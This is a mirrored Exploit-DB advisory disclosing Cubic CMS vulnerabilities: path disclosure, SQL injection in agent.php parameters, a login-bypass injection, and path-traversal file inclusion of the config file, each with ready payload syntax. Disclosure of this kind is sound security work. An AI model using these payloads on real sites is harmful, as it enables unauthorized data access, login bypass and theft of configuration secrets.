Cubic CMS – Multiple Vulnerabilities

• Exploit Database
• 11 阅读

• 作者： Eugenio Delfa
  日期： 2014-01-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/30790/

• I. BACKGROUND
  -------------------------
  "CUBIC CMS" is a non-free content management system for websites and 
  portals of any size, powerful, adaptable to any graphic design that 
  allows users administration 100% professional but simple at the same 
  time that website.
  
  II. VULNERABILITIES
  -------------------------
  
  II.i FULL PATH DISCLOSURE
  -------------------------
  CUBIC CMS presents a full path disclosure in the 'Controller Not Found' 
  exception management, due to an incorrect 'Software Exception' management.
  
  Syntax: 
  http://www.example.com/id/-22
  http://www.example.com/foo.bar
  
  II.ii SQL Injection
  -------------------------
  CUBIC CMS presents a SQL Injection in its 'resource_id' and 'version_id' parameters 
  on his '/recursos/agent.php' (Resources Management Module) script via GET HTTP 
  Method, due to an insufficient sanitization on user supplied data.
  
  Syntax:
  http://www.example.com/recursos/agent.php?resource_id=-11 OR 'foobar' UNION SELECT user()-- -
  http://www.example.com/recursos/agent.php?version_id=-22 OR '' UNION SELECT @@version-- -
  
  II.iii SQL Injection
  -------------------------
  CUBIC CMS presents a SQL Injection in its 'login' and 'pass' parameters on his 
  '/login.usuario' (Users Management Module) script via POST HTTP Method, due to an 
  insufficient sanitization on user supplied data.
  
  Syntax:
  login=Administrator&pass=foobar') or ('1'='1
  
  II.iv Local File Inclusion
  -------------------------
  CUBIC CMS presents a SQL Injection in its 'path' parameter on his 
  '/recursos/agent.php' (Resources Management Module) script via GET HTTP Method, 
  due to an insufficient sanitization on user supplied data.
  
  Syntax:
  http://www.example.com/recursos/agent.php?path=/../../application/config/project.ini
  
  IV. REFERENCES
  -------------------------
  http://www.proyectosbds.com
  Inicio diseño web
  
  
  V. DISCLOSURE TIMELINE
  -------------------------
  - March 28, 2012: First Vendor Contact.
  - Dec 30, 2013: Second Vendor Contact (Still waiting for responses).
  
  VI. CREDITS
  -------------------------
  This vulnerability has been discovered
  by Eugenio Delfa <ed (at) isbox (dot) org>.